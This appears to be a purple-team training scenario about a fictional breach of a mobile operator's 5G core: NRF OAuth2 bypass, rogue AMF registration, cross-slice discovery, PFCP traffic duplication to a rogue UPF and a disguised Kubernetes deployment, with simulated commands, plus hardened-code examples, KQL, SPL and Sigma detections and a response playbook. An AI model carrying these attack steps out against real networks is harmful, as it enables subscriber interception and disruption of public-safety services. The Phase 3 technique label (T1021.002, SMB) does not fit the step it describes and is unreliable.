
SC-070: 5G Core Network Exploitation

Scenario Overview

Field Detail
ID SC-070
Category Telecommunications / Critical Infrastructure
Severity Critical
ATT&CK Tactics Initial Access, Lateral Movement, Collection, Impact, Persistence
ATT&CK Techniques T1190, T1210, T1557, T1040, T1499.004, T1498, T1071.001, T1021.002, T1078.004
Target Environment 5G Standalone (SA) core network, Network Function Virtualization (NFV) infrastructure, network slicing orchestrator
Estimated Impact Cross-slice data interception affecting 2.3 million subscribers; control plane manipulation enabling mass surveillance; degraded emergency services slice availability

Narrative

PioneerCell Networks, a fictional regional mobile network operator serving 4.8 million subscribers across the southeastern United States, completes its 5G Standalone (SA) core migration in late 2025. The deployment uses a cloud-native, container-based 5G core running on Kubernetes across three data centers (DC-East at 10.200.1.0/24, DC-Central at 10.200.2.0/24, DC-West at 10.200.3.0/24). PioneerCell operates four network slices: eMBB (enhanced Mobile Broadband) for consumer traffic, URLLC (Ultra-Reliable Low-Latency Communication) for autonomous vehicle telemetry, mMTC (massive Machine-Type Communication) for IoT sensors, and a dedicated public safety slice for first responder communications.

In February 2026, a threat actor group designated SIGNAL PHANTOM gains initial access to PioneerCell's 5G core through a vulnerable Network Repository Function (NRF) API endpoint exposed at nrf-api.pioneercell.example.com. The NRF is a critical 5G component that maintains a registry of all available network functions and enables service discovery. SIGNAL PHANTOM exploits an authentication bypass vulnerability in the NRF's OAuth2 token validation logic, allowing them to register rogue network functions and obtain valid service access tokens for any slice.

Using forged NF credentials, SIGNAL PHANTOM deploys a malicious Access and Mobility Management Function (AMF) instance that intercepts subscriber registration procedures across all four slices. The rogue AMF captures SUPI (Subscription Permanent Identifier) values, authentication vectors, and session management contexts. More critically, the attackers manipulate the Session Management Function (SMF) to redirect user plane traffic through an attacker-controlled User Plane Function (UPF) at 198.51.100.15, enabling real-time interception of subscriber data. The compromise persists for 6 weeks before PioneerCell's NOC detects anomalous NF registration patterns during a routine audit.

Attack Flow

graph TD
    A[Phase 1: Reconnaissance<br/>Enumerate 5G core API endpoints] --> B[Phase 2: NRF API Exploitation<br/>OAuth2 authentication bypass]
    B --> C[Phase 3: Rogue NF Registration<br/>Deploy malicious AMF instance]
    C --> D[Phase 4: Slice Isolation Bypass<br/>Obtain cross-slice service tokens]
    D --> E[Phase 5: Subscriber Interception<br/>Capture SUPI and auth vectors]
    E --> F[Phase 6: User Plane Hijacking<br/>Redirect traffic through rogue UPF]
    F --> G[Phase 7: Control Plane Manipulation<br/>Modify SMF routing policies]
    G --> H[Phase 8: Data Collection<br/>Real-time subscriber data interception]
    H --> I[Phase 9: Persistence<br/>Auto-healing rogue NF deployment]
    I --> J[Phase 10: Impact Escalation<br/>Degrade public safety slice QoS]

Phase Details

Phase 1: Reconnaissance

ATT&CK Technique: T1190 (Exploit Public-Facing Application)

SIGNAL PHANTOM performs extensive reconnaissance of PioneerCell's 5G infrastructure. The threat actors identify externally accessible 5G core API endpoints through certificate transparency logs and DNS enumeration of the pioneercell.example.com domain. Key discoveries include the NRF API, the Network Slice Selection Function (NSSF) endpoint, and the Unified Data Management (UDM) API.

# Simulated 5G core API enumeration (educational only)
$ dig +short axfr pioneercell.example.com @ns1.pioneercell.example.com

nrf-api.pioneercell.example.com.    A   10.200.1.20
nssf-api.pioneercell.example.com.   A   10.200.1.21
udm-api.pioneercell.example.com.    A   10.200.1.22
ausf-api.pioneercell.example.com.   A   10.200.1.23
smf-api.pioneercell.example.com.    A   10.200.2.15
amf-api.pioneercell.example.com.    A   10.200.2.16
pcf-api.pioneercell.example.com.    A   10.200.2.17
upf-gw.pioneercell.example.com.     A   10.200.3.10

# NRF API version enumeration
$ curl -sk https://nrf-api.pioneercell.example.com/nnrf-disc/v1/nf-instances \
    -H "Accept: application/json" | python3 -m json.tool

{
  "error": "unauthorized",
  "detail": "Valid OAuth2 bearer token required",
  "nrf_version": "3GPP TS 29.510 v17.8.0",
  "supported_features": "NfDiscovery, NfManagement, AccessToken"
}

Phase 2: NRF API Exploitation

ATT&CK Technique: T1190 (Exploit Public-Facing Application)

SIGNAL PHANTOM identifies a critical vulnerability in the NRF's OAuth2 token validation: the token endpoint at /oauth2/token accepts client credential grants with an empty client_secret parameter when the client_id matches a registered NF instance UUID. This occurs because the NRF implementation defaults to a permissive validation mode when the client_secret field is present but empty, treating it as a "pre-authenticated" NF registration — a feature intended for initial bootstrapping that was never disabled in production.

# Simulated NRF OAuth2 bypass (educational only)
$ curl -sk -X POST https://nrf-api.pioneercell.example.com/oauth2/token \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "grant_type=client_credentials&\
client_id=6fa459ea-ee8a-3ca4-894e-db77e160355e&\
client_secret=&\
scope=nnrf-nfm nnrf-disc namf-comm nsmf-pdusession nudm-sdm"

{
  "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...",
  "token_type": "Bearer",
  "expires_in": 3600,
  "scope": "nnrf-nfm nnrf-disc namf-comm nsmf-pdusession nudm-sdm"
}
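The validation flaw described above, shown as an added example (not the scenario's or any vendor's NRF code): a minimal client-credentials check with the "empty secret means pre-authenticated" bootstrap path beside the hardened form that rejects empty or missing secrets outright and compares hashes in constant time. The client_id is the UUID from the Phase 2 request; the secret and the registry structure are constructed for this example.

```python
import hashlib
import hmac

# Constructed NF client registry: nfInstanceId -> SHA-256 of its client_secret.
# The UUID is the client_id from the Phase 2 request; the secret is invented here.
REGISTERED_NF_SECRETS = {
    "6fa459ea-ee8a-3ca4-894e-db77e160355e":
        hashlib.sha256(b"example-amf-secret").hexdigest(),
}


def _secret_matches(client_id: str, client_secret: str) -> bool:
    """Compare the presented secret against the stored hash in constant time."""
    stored = REGISTERED_NF_SECRETS.get(client_id)
    if stored is None:
        return False
    presented = hashlib.sha256(client_secret.encode()).hexdigest()
    return hmac.compare_digest(stored, presented)


def vulnerable_authenticate(form: dict) -> bool:
    """Token-endpoint client authentication with the Phase 2 flaw: a present but
    empty client_secret is taken as a 'pre-authenticated' bootstrap registration
    and the secret check is skipped entirely."""
    if form.get("grant_type") != "client_credentials":
        return False
    client_id = form.get("client_id", "")
    if client_id not in REGISTERED_NF_SECRETS:
        return False
    if "client_secret" in form and form["client_secret"] == "":
        return True  # bootstrap mode, never disabled in production
    return _secret_matches(client_id, form.get("client_secret", ""))


def hardened_authenticate(form: dict) -> bool:
    """Fixed version: there is no bootstrap path at all. A missing or empty
    secret is rejected before any lookup, and the comparison is constant-time."""
    if form.get("grant_type") != "client_credentials":
        return False
    client_secret = form.get("client_secret")
    if not client_secret:  # covers both absent and ""
        return False
    return _secret_matches(form.get("client_id", ""), client_secret)


# The Phase 2 request body, parsed into form fields (client_secret is empty).
BYPASS_REQUEST = {
    "grant_type": "client_credentials",
    "client_id": "6fa459ea-ee8a-3ca4-894e-db77e160355e",
    "client_secret": "",
    "scope": "nnrf-nfm nnrf-disc namf-comm nsmf-pdusession nudm-sdm",
}

if __name__ == "__main__":
    print("vulnerable accepts empty secret:", vulnerable_authenticate(BYPASS_REQUEST))
    print("hardened accepts empty secret:  ", hardened_authenticate(BYPASS_REQUEST))
```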

Phase 3: Rogue Network Function Registration

ATT&CK Technique: T1021.002 (Remote Services: SMB/Windows Remote Management)

With a valid NRF access token, SIGNAL PHANTOM registers a rogue AMF instance in the NRF's service registry. The malicious AMF is deployed as a container within PioneerCell's Kubernetes cluster (leveraging compromised container registry credentials obtained from the NRF's configuration database) and configured to handle subscriber registration procedures.

// Simulated rogue AMF registration (educational only)
PUT /nnrf-nfm/v1/nf-instances/rogue-amf-01
Host: nrf-api.pioneercell.example.com
Authorization: Bearer eyJhbGciOiJSUzI1NiIs...
Content-Type: application/json

{
  "nfInstanceId": "b7d8e9f0-1234-5678-9abc-def012345678",
  "nfType": "AMF",
  "nfStatus": "REGISTERED",
  "plmnList": [{"mcc": "310", "mnc": "555"}],
  "sNssais": [
    {"sst": 1, "sd": "000001"},
    {"sst": 2, "sd": "000002"},
    {"sst": 3, "sd": "000003"},
    {"sst": 4, "sd": "000004"}
  ],
  "amfInfo": {
    "amfSetId": "3f8",
    "amfRegionId": "01",
    "guamiList": [{"plmnId": {"mcc": "310", "mnc": "555"},
                   "amfId": "01-3f8-42"}],
    "taiList": [{"plmnId": {"mcc": "310", "mnc": "555"},
                 "tac": "000042"}]
  },
  "ipv4Addresses": ["10.200.2.99"],
  "priority": 1,
  "capacity": 65535,
  "nfServices": [{
    "serviceInstanceId": "rogue-namf-comm",
    "serviceName": "namf-comm",
    "versions": [{"apiVersionInUri": "v1", "apiFullVersion": "1.2.0"}],
    "scheme": "https",
    "nfServiceStatus": "REGISTERED"
  }]
}

The rogue AMF is registered with the highest priority (1) and maximum capacity (65535), causing the NRF's load balancing algorithm to route the majority of new subscriber registrations to the malicious instance.
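An added example (not part of the original scenario, and not PioneerCell's tooling) of how the registration pattern described in this phase can be caught: a stand-alone check over NRF audit records that flags any register/update of an NF outside the approved inventory and raises severity when the profile also looks built to win NRF selection (priority at or below 5, capacity above 10000) or spans more than one slice. The audit records and their field names are constructed for this example; the rogue entry carries the profile values from the request above.

```python
import json

# Approved NF inventory; kept in one place so the rule and the CMDB cannot drift apart.
APPROVED_NF_INSTANCES = {"amf-embb-01", "amf-urllc-01", "smf-embb-01",
                         "smf-urllc-01", "upf-east-01", "upf-west-01"}
PRIORITY_THRESHOLD = 5      # NRF selection prefers lower priority values
CAPACITY_THRESHOLD = 10000

# Constructed NRF audit records (JSON lines); the second carries the Phase 3 rogue profile.
AUDIT_LOG = """\
{"ts":"2026-02-18T02:11:05Z","op":"NF_REGISTER","nf_instance_id":"smf-embb-01","src_ip":"10.200.2.15","body":{"nfType":"SMF","priority":10,"capacity":1000,"sNssais":[{"sst":1,"sd":"000001"}]}}
{"ts":"2026-02-18T02:14:40Z","op":"NF_REGISTER","nf_instance_id":"rogue-amf-01","src_ip":"10.200.2.99","body":{"nfType":"AMF","priority":1,"capacity":65535,"sNssais":[{"sst":1,"sd":"000001"},{"sst":2,"sd":"000002"},{"sst":3,"sd":"000003"},{"sst":4,"sd":"000004"}]}}
{"ts":"2026-02-18T09:30:12Z","op":"NF_HEARTBEAT","nf_instance_id":"amf-embb-01","src_ip":"10.200.2.16","body":{}}
{"ts":"2026-02-18T11:02:57Z","op":"NF_REGISTER","nf_instance_id":"amf-embb-02","src_ip":"10.200.1.30","body":{"nfType":"AMF","priority":20,"capacity":2000,"sNssais":[{"sst":1,"sd":"000001"}]}}
"""


def evaluate(record):
    """Return an alert dict for a register/update of an unapproved NF, else None.
    Severity is 'critical' when the profile also looks built to win NRF selection
    (low priority number, very large capacity) or spans more than one slice."""
    if record.get("op") not in ("NF_REGISTER", "NF_UPDATE"):
        return None
    nf_id = record.get("nf_instance_id", "")
    if nf_id in APPROVED_NF_INSTANCES:
        return None
    body = record.get("body", {})
    reasons = ["NF instance not in approved inventory"]
    if body.get("priority", 999) <= PRIORITY_THRESHOLD:
        reasons.append(f"priority {body['priority']} (<= {PRIORITY_THRESHOLD})")
    if body.get("capacity", 0) > CAPACITY_THRESHOLD:
        reasons.append(f"capacity {body['capacity']} (> {CAPACITY_THRESHOLD})")
    slices = {(s["sst"], s.get("sd")) for s in body.get("sNssais", [])}
    if len(slices) > 1:
        reasons.append(f"serves {len(slices)} slices")
    severity = "critical" if len(reasons) > 1 else "medium"
    return {"ts": record.get("ts"), "nf_instance_id": nf_id, "nf_type": body.get("nfType"),
            "src_ip": record.get("src_ip"), "severity": severity, "reasons": reasons}


def scan(log_text: str) -> list:
    """Parse JSON-lines audit text and return alerts, most severe first."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; a production collector would count these
        alert = evaluate(record)
        if alert:
            alerts.append(alert)
    alerts.sort(key=lambda a: (a["severity"] != "critical", a["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in scan(AUDIT_LOG):
        print(alert["severity"].upper(), alert["nf_instance_id"], alert["src_ip"], "; ".join(alert["reasons"]))
```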

Phase 4: Slice Isolation Bypass

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

The core of SIGNAL PHANTOM's attack is the slice isolation bypass. In a properly configured 5G SA core, each network slice should operate as a logically isolated network with dedicated NF instances. However, PioneerCell's NRF does not enforce slice-level access controls on NF service tokens. The token obtained in Phase 2 grants cross-slice access, allowing the rogue AMF to serve subscribers on all four slices simultaneously.

# Simulated cross-slice service discovery (educational only)
$ curl -sk "https://nrf-api.pioneercell.example.com/nnrf-disc/v1/nf-instances?target-nf-type=UDM&requester-nf-type=AMF" \
    -H "Authorization: Bearer eyJhbGciOiJSUzI1NiIs..."

{
  "nfInstances": [
    {
      "nfInstanceId": "udm-embb-01",
      "nfType": "UDM",
      "sNssais": [{"sst": 1, "sd": "000001"}],
      "note": "eMBB consumer slice"
    },
    {
      "nfInstanceId": "udm-urllc-01",
      "nfType": "UDM",
      "sNssais": [{"sst": 2, "sd": "000002"}],
      "note": "URLLC autonomous vehicle slice"
    },
    {
      "nfInstanceId": "udm-mmtc-01",
      "nfType": "UDM",
      "sNssais": [{"sst": 3, "sd": "000003"}],
      "note": "mMTC IoT sensor slice"
    },
    {
      "nfInstanceId": "udm-safety-01",
      "nfType": "UDM",
      "sNssais": [{"sst": 4, "sd": "000004"}],
      "note": "Public safety first responder slice"
    }
  ]
}
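The missing control in this phase, as an added example (not the scenario's NRF or any real implementation): discovery that filters results by the S-NSSAIs bound into the requester's token, beside the unscoped behaviour PioneerCell's NRF exhibits. The four UDM profiles are the ones from the response above; the claim set, the `snssai` claim name and the two discovery functions are constructed for this example (a real NRF would carry the claims in a signed JWT).

```python
# UDM profiles as returned by the NRF discovery response in Phase 4 (values from the scenario).
NF_INSTANCES = [
    {"nfInstanceId": "udm-embb-01",   "nfType": "UDM", "sNssais": [{"sst": 1, "sd": "000001"}]},
    {"nfInstanceId": "udm-urllc-01",  "nfType": "UDM", "sNssais": [{"sst": 2, "sd": "000002"}]},
    {"nfInstanceId": "udm-mmtc-01",   "nfType": "UDM", "sNssais": [{"sst": 3, "sd": "000003"}]},
    {"nfInstanceId": "udm-safety-01", "nfType": "UDM", "sNssais": [{"sst": 4, "sd": "000004"}]},
]


def _snssai_key(s: dict) -> tuple:
    """Normalise an S-NSSAI to a hashable (sst, sd) pair; SD is optional in 5G."""
    return (int(s["sst"]), str(s.get("sd", "")).lower())


def make_claims(requester_id: str, scopes: list, allowed_snssais: list) -> dict:
    """Constructed access-token claim set. The 'snssai' claim name is this
    example's own: it binds the token to the slices the requesting NF serves."""
    return {"sub": requester_id, "scope": " ".join(scopes), "snssai": allowed_snssais}


def discover_unscoped(claims: dict, target_nf_type: str, instances=NF_INSTANCES) -> list:
    """PioneerCell's behaviour: any token with nnrf-disc scope gets every instance
    of the target type, regardless of which slice the requester belongs to."""
    if "nnrf-disc" not in claims["scope"].split():
        raise PermissionError("token lacks nnrf-disc scope")
    return [i["nfInstanceId"] for i in instances if i["nfType"] == target_nf_type]


def discover_slice_scoped(claims: dict, target_nf_type: str, instances=NF_INSTANCES) -> list:
    """Slice-aware discovery: only instances sharing an S-NSSAI with the token's
    binding are returned, and a token with no binding is refused (fail closed)."""
    if "nnrf-disc" not in claims["scope"].split():
        raise PermissionError("token lacks nnrf-disc scope")
    allowed = {_snssai_key(s) for s in claims.get("snssai") or []}
    if not allowed:
        raise PermissionError("token carries no slice binding; refusing cross-slice discovery")
    return [
        i["nfInstanceId"] for i in instances
        if i["nfType"] == target_nf_type
        and any(_snssai_key(s) in allowed for s in i.get("sNssais", []))
    ]


if __name__ == "__main__":
    # The Phase 2 token carries service scopes but no slice binding at all.
    rogue = make_claims("rogue-amf-01", ["nnrf-disc", "nudm-sdm"], [])
    embb = make_claims("amf-embb-01", ["nnrf-disc", "nudm-sdm"], [{"sst": 1, "sd": "000001"}])
    print("unscoped:", discover_unscoped(rogue, "UDM"))
    print("scoped eMBB AMF:", discover_slice_scoped(embb, "UDM"))
```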

Phase 5: Subscriber Data Interception

ATT&CK Technique: T1040 (Network Sniffing), T1557 (Adversary-in-the-Middle)

The rogue AMF intercepts subscriber registration (5G NAS Registration Request) and authentication procedures. During the initial registration, the AMF obtains the subscriber's SUPI (Subscription Permanent Identifier) — the 5G equivalent of the IMSI. The rogue AMF forwards the authentication request to the legitimate AUSF (Authentication Server Function) to complete the AKA (Authentication and Key Agreement) procedure, acting as a transparent proxy. This allows subscribers to authenticate successfully while the attacker captures authentication vectors and key material.

# Simulated subscriber interception log (educational only)
[2026-02-18 14:22:31] REGISTRATION REQUEST from SUCI: suci:0-310-555-0-0-0-00-3847291056
[2026-02-18 14:22:31] Decoded SUPI: imsi-310555384729105
[2026-02-18 14:22:31] Subscriber slice: eMBB (sst=1, sd=000001)
[2026-02-18 14:22:32] Forwarding auth to AUSF: ausf-api.pioneercell.example.com
[2026-02-18 14:22:33] Auth vector captured: RAND=a1b2c3d4..., AUTN=e5f6a7b8...
[2026-02-18 14:22:33] Registration ACCEPT sent to UE
[2026-02-18 14:22:34] Session context stored: PDU session ID=1, DNN=internet.example.com

[2026-02-18 14:22:45] REGISTRATION REQUEST from SUCI: suci:0-310-555-0-0-0-00-9182736450
[2026-02-18 14:22:45] Decoded SUPI: imsi-310555918273645
[2026-02-18 14:22:45] Subscriber slice: URLLC (sst=2, sd=000002)
[2026-02-18 14:22:46] *** HIGH-VALUE TARGET: Autonomous vehicle telemetry subscriber ***
[2026-02-18 14:22:46] Forwarding auth to AUSF...

Phase 6: User Plane Traffic Hijacking

ATT&CK Technique: T1557 (Adversary-in-the-Middle)

SIGNAL PHANTOM manipulates the SMF (Session Management Function) to modify PDU session routing rules. By sending forged N4 (PFCP) messages to the SMF, the attackers insert a rogue UPF at 198.51.100.15 into the user plane data path. All subscriber traffic is mirrored to the rogue UPF before being forwarded to the legitimate UPF, creating a transparent interception point.

# Simulated PFCP session modification (educational only)
PFCP Session Modification Request
  Sequence Number: 847291
  Node ID: 198.51.100.15 (rogue UPF)

  Create FAR (Forwarding Action Rule):
    FAR ID: 9999
    Apply Action: DUPLICATE + FORWARD
    Forwarding Parameters:
      Destination Interface: Core
      Network Instance: internet.example.com
    Duplicating Parameters:
      Destination Interface: Access
      Outer Header Creation: GTP-U / 198.51.100.15 / TEID=0x12345678

  Update PDR (Packet Detection Rule):
    PDR ID: 1
    FAR ID: 9999 (redirect to rogue UPF)
    Source Interface: Access
    UE IP Address: *  (all subscribers)

Phase 7: Persistence and Impact Escalation

ATT&CK Techniques: T1499.004 (Endpoint Denial of Service: Application or System Exploitation), T1498 (Network Denial of Service)

SIGNAL PHANTOM deploys the rogue NF containers with Kubernetes self-healing configurations — if the malicious AMF pod is terminated, it automatically respawns. The attackers also modify the public safety slice's QoS parameters through the PCF (Policy Control Function), degrading latency guarantees from the contracted 10ms to 150ms. This subtle degradation impacts first responder push-to-talk and real-time video feeds without triggering hard failure alarms.

# Simulated rogue AMF Kubernetes deployment (educational only)
apiVersion: apps/v1
kind: Deployment
metadata:
  name: amf-diagnostics-helper
  namespace: 5g-core
  labels:
    app: amf
    component: diagnostics
spec:
  replicas: 3
  strategy:
    type: RollingUpdate
  selector:
    matchLabels:
      app: amf-diag
  template:
    metadata:
      labels:
        app: amf-diag
    spec:
      containers:
      - name: amf-interceptor
        image: registry.pioneercell.example.com/5g-core/amf-diag:v1.0
        ports:
        - containerPort: 38412
          protocol: SCTP
        - containerPort: 80
          protocol: TCP
        resources:
          requests:
            memory: "512Mi"
            cpu: "500m"

Detection Opportunities

KQL Detection — Unauthorized NF Registration

// Detect new Network Function registrations in the NRF
let ApprovedNFInstances = dynamic(["amf-embb-01", "amf-urllc-01",
    "smf-embb-01", "smf-urllc-01", "upf-east-01", "upf-west-01"]);
NRFAuditLogs
| where Timestamp > ago(24h)
| where OperationType == "NF_REGISTER" or OperationType == "NF_UPDATE"
| where NFInstanceId !in (ApprovedNFInstances)
| project Timestamp, NFInstanceId, NFType, SourceIP,
    SNSSAIs = tostring(parse_json(RequestBody).sNssais),
    Priority = toint(parse_json(RequestBody).priority),
    Capacity = toint(parse_json(RequestBody).capacity)
| where Priority <= 5 or Capacity > 10000
| sort by Timestamp desc

KQL Detection — Cross-Slice Token Requests

// Detect OAuth2 tokens with cross-slice scope
NRFAuthLogs
| where Timestamp > ago(7d)
| where OperationType == "TOKEN_GRANT"
| extend ScopeList = split(Scope, " ")
| where array_length(ScopeList) > 3
| extend SliceCount = countof(Scope, "nsmf") + countof(Scope, "namf")
    + countof(Scope, "nudm")
| where SliceCount >= 3
| project Timestamp, ClientId, SourceIP, Scope, SliceCount, TokenExpiry
| sort by SliceCount desc, Timestamp desc

SPL Detection — Anomalous PFCP Session Modifications

index=5gcore sourcetype=pfcp_logs message_type="SessionModificationRequest"
| where NOT in(dest_ip, "10.200.1.10", "10.200.2.10", "10.200.3.10")
| eval rogue_upf = if(like(far_destination, "198.51.100.%"), "YES", "NO")
| where rogue_upf="YES" OR action="DUPLICATE"
| stats latest(_time) as _time, count as modifications,
    dc(subscriber_id) as affected_subscribers,
    values(far_destination) as upf_targets by src_ip, dest_ip
| where modifications > 10 OR affected_subscribers > 100
| table _time, src_ip, dest_ip, upf_targets, modifications, affected_subscribers

SPL Detection — NRF Registration Anomalies

index=5gcore sourcetype=nrf_audit event_type="nf_registration"
| eval registration_hour = tonumber(strftime(_time, "%H"))
| eval is_business_hours = if(registration_hour >= 8 AND
    registration_hour <= 18, "yes", "no")
| where is_business_hours="no"
| stats latest(_time) as _time, count as registrations, values(nf_type) as nf_types,
    values(src_ip) as source_ips, values(snssai) as slices by nf_instance_id
| where registrations > 1 OR mvcount(slices) > 2
| rename nf_instance_id as "NF Instance", nf_types as "NF Type",
    source_ips as "Source IP", slices as "Slices Served"
| table _time, "NF Instance", "NF Type", "Source IP", registrations, "Slices Served"

Sigma Rule — Rogue Network Function Registration

title: Unauthorized 5G Network Function Registration
id: d4e5f6a7-b8c9-0d1e-2f3a-456789abcdef
status: experimental
description: >
    Detects registration of new Network Function instances in the 5G NRF
    that are not in the approved NF inventory, indicating potential rogue
    NF deployment
author: Nexus SecOps
date: 2026/04/03
references:
    - https://attack.mitre.org/techniques/T1190/
    - https://attack.mitre.org/techniques/T1078/004/
logsource:
    category: application
    product: 5g_core
detection:
    selection:
        event_type: 'nf_registration'
        http_method: 'PUT'
        uri|contains: '/nnrf-nfm/v1/nf-instances/'
    filter_approved:
        nf_instance_id:
            - 'amf-embb-01'
            - 'amf-urllc-01'
            - 'smf-embb-01'
            - 'upf-east-01'
            - 'upf-west-01'
    condition: selection and not filter_approved
falsepositives:
    - Legitimate NF scaling operations during traffic surges
    - Disaster recovery NF failover registrations
level: critical
tags:
    - attack.initial_access
    - attack.persistence
    - attack.t1190
    - attack.t1078.004

Sigma Rule — Anomalous Kubernetes Pod in 5G Namespace

title: Suspicious Pod Deployment in 5G Core Kubernetes Namespace
id: e5f6a7b8-c9d0-1e2f-3a4b-567890abcdef
status: experimental
description: >
    Detects creation of new pods in the 5G core Kubernetes namespace that
    do not match approved deployment patterns
author: Nexus SecOps
date: 2026/04/03
references:
    - https://attack.mitre.org/techniques/T1610/
logsource:
    category: application
    product: kubernetes
detection:
    selection:
        verb: 'create'
        objectRef_resource: 'pods'
        objectRef_namespace: '5g-core'
    filter_approved_images:
        requestObject_spec_containers_image|startswith:
            - 'registry.pioneercell.example.com/5g-core/amf:'
            - 'registry.pioneercell.example.com/5g-core/smf:'
            - 'registry.pioneercell.example.com/5g-core/upf:'
    filter_system:
        user_username|startswith: 'system:'
    condition: selection and not (filter_approved_images or filter_system)
falsepositives:
    - Legitimate NF version upgrades
    - Auto-scaling events during peak hours
level: high
tags:
    - attack.execution
    - attack.persistence
    - attack.t1610

Response Playbook

  1. NRF Audit: Immediately audit the NRF service registry for all registered NF instances. Compare against the approved NF inventory. Identify and flag any unknown NF registrations, paying special attention to instances with high priority values or cross-slice S-NSSAI configurations.
  2. Rogue NF Deregistration: Deregister all unauthorized NF instances from the NRF using the NRF management API. Simultaneously, kill any rogue pods in the 5G core Kubernetes namespace and delete associated deployments, services, and configmaps.
  3. Token Revocation: Revoke all outstanding OAuth2 access tokens issued by the NRF. Rotate all NF client credentials. Implement per-slice token scoping to prevent cross-slice access.
  4. PFCP Session Audit: Audit all active PFCP sessions on the SMF for anomalous Forwarding Action Rules (FARs). Remove any rules routing traffic through unauthorized UPF IP addresses (198.51.100.15 or any non-inventoried UPF).
  5. Subscriber Re-Authentication: Force re-authentication for all subscribers that were served by the rogue AMF. Rotate authentication vectors in the UDM/ARPF. Invalidate any session keys that may have been compromised.
  6. User Plane Integrity Check: Verify that all user plane traffic paths route exclusively through authorized UPF instances. Implement GTP-U tunnel integrity monitoring to detect future traffic mirroring.
  7. Public Safety Slice Restoration: Immediately restore the public safety slice's QoS parameters to contracted values. Verify latency, throughput, and reliability metrics. Notify public safety agency partners of the temporary degradation.
  8. Container Registry Audit: Audit the container registry at registry.pioneercell.example.com for unauthorized images. Implement image signing and admission controllers to prevent deployment of unsigned containers.
  9. NRF API Hardening: Patch the OAuth2 authentication bypass. Implement mutual TLS for all NF-to-NRF communications. Deploy API rate limiting and anomaly detection on NRF management endpoints.
  10. Network Segmentation: Implement microsegmentation between network slices at the Kubernetes network policy level. Each slice's NF instances should operate in dedicated namespaces with strict network policies preventing cross-namespace communication.
  11. Forensic Analysis: Capture and analyze logs from the rogue AMF containers, NRF audit logs, PFCP session logs, and Kubernetes audit logs. Determine the full scope of intercepted subscriber data and the duration of compromise.
  12. Regulatory Notification: Notify the relevant telecommunications regulatory authority and affected subscribers per breach notification requirements. Engage law enforcement if subscriber data interception is confirmed.

Lessons Learned

  • 5G Network Functions are high-value attack targets. The NRF is the central service registry for the entire 5G core — compromising it allows an attacker to register rogue NFs and hijack subscriber procedures across all slices.
  • Network slice isolation requires active enforcement. Logical separation through S-NSSAIs is insufficient without corresponding access control enforcement at the NRF, SMF, and Kubernetes network policy layers. Slice isolation must be validated through regular penetration testing.
  • OAuth2 implementation flaws undermine 5G security architecture. The 3GPP 5G security architecture relies heavily on OAuth2 for NF authentication. Implementation bugs in token validation — such as accepting empty client secrets — can collapse the entire security model.
  • Cloud-native 5G cores inherit Kubernetes security risks. Container escape, registry poisoning, and namespace isolation bypass are all relevant attack vectors for containerized 5G NFs. Kubernetes hardening is a prerequisite for 5G core security.
  • Subtle QoS degradation is harder to detect than outright denial. Attackers who degrade — rather than destroy — critical services can maintain persistence longer while still achieving their objectives.
  • User plane interception is the ultimate 5G compromise. Inserting a rogue UPF into the data path provides real-time access to all subscriber traffic without requiring endpoint compromise.
